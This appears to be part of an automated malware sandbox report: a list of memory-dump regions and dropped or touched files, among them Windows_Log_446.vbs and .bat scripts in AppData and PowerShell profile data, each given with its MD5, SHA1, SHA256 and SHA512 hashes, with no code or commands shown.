memory/3644-10-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp
memory/3644-12-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp
memory/3644-11-0x000002279EAB0000-0x000002279EAF6000-memory.dmp
memory/3644-13-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp
memory/3644-14-0x000002279E870000-0x000002279E878000-memory.dmp
memory/3644-15-0x000002279E880000-0x000002279E892000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

| Hash | Value |
| --- | --- |
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |

C:\Users\Admin\AppData\Roaming\Windows_Log_446.vbs

| Hash | Value |
| --- | --- |
| MD5 | f1d53f9e9215d8994929dd1e08edaa2a |
| SHA1 | 3feb3e809b0ed0edd2d02a040c245b3a7ef78a35 |
| SHA256 | c2d80c5301739f899742758c62816f8e1015ce96bad9a22b7ff39f2ca3593948 |
| SHA512 | 8cc439fb9d07500383eab15822d6794fbe8b9a5ccdb024c6c9cac27dea4a76afda54255477f27ecdca013e3a68c4c7278cbcec01be1e6095cf13c3f7cb2e4441 |

C:\Users\Admin\AppData\Roaming\Windows_Log_446.bat

| Hash | Value |
| --- | --- |
| MD5 | 561c4ecf6ab3848d4d45ee983b5e6bd3 |
| SHA1 | 11e581a4bd84cad824f1dfce89962ab593b4193a |
| SHA256 | 2b7272581314f0f4b3cd41c32cc9ebd5950eb1acf67601bd6bdf1365aacc8eab |
| SHA512 | 1f6f460a4df29eb2a2b1f8bb932e549e51c4b257c3ce6808038d877a50fa3b8bccaea38aa900d00e9207a764f7aebfc0f9a7b5a07bc53a9902544e0d280ad716 |

\??\PIPE\srvsvc

| Hash | Value |
| --- | --- |
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

| Hash | Value |
| --- | --- |
| MD5 | 3ec0d76d886b2f4b9f1e3da7ce9e2cd7 |
| SHA1 | 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea |
| SHA256 | 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5 |
| SHA512 | a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6 |

memory/1956-44-0x000001E26EF90000-0x000001E26EFA6000-memory.dmp
memory/3644-45-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

| Hash | Value |
| --- | --- |
| MD5 | 20573d05fc1acef706ffbdd4dc9f45dc |
| SHA1 | defd35463b3433657ebb00de76d5f0cd0b81c81b |
| SHA256 | 0a2b951533b29655270b941077bbf34ba21a5a59aebaf9948130ff31c7adf808 |
| SHA512 | 8eca0f79e84f4018dd01d5c24b3f7e3b62a8ed7b186e1d918d4452e8f0c7a66b5e92efb74b76d22339a8bad7818147ee486582b384ca99db31e44e3219daf7b7 |

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

| Hash | Value |
| --- | --- |
| MD5 | 1a9fa92a4f2e2ec9e244d43a6a4f8fb9 |
| SHA1 | 9910190edfaccece1dfcc1d92e357772f5dae8f7 |
| SHA256 | 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888 |
| SHA512 | 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64 |

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

| Hash | Value |
| --- | --- |
| MD5 | cef328ddb1ee8916e7a658919323edd8 |
| SHA1 | a676234d426917535e174f85eabe4ef8b88256a5 |
| SHA256 | a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90 |
| SHA512 | 747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb |

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

| Hash | Value |
| --- | --- |
| MD5 | 4914eb0b2ff51bfa48484b5cc8454218 |
| SHA1 | 6a7c3e36ce53b42497884d4c4a3bda438dd4374b |
| SHA256 | 7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e |
| SHA512 | 83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500 |

memory/1956-92-0x000001E26EF80000-0x000001E26EF8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpB10D.tmp.bat

| Hash | Value |
| --- | --- |
| MD5 | 4c221033fb391ea41dc631bcda3de4e3 |
| SHA1 | 5cad930ee31c7bdda2cadcaa81ca4a8bbc09b185 |
| SHA256 | 4614ec05e77fda5b5c2521cf1782d4952b061f5e6183aa9f601aea7a7a6cc541 |
| SHA512 | 4848a5d55988e10088875b766b2747d69ccec145c04c9c0124569108a0d935b386555a8b0d63afd4036bd2064d8c3fb3c63067da297e91216874bb130297ef3a |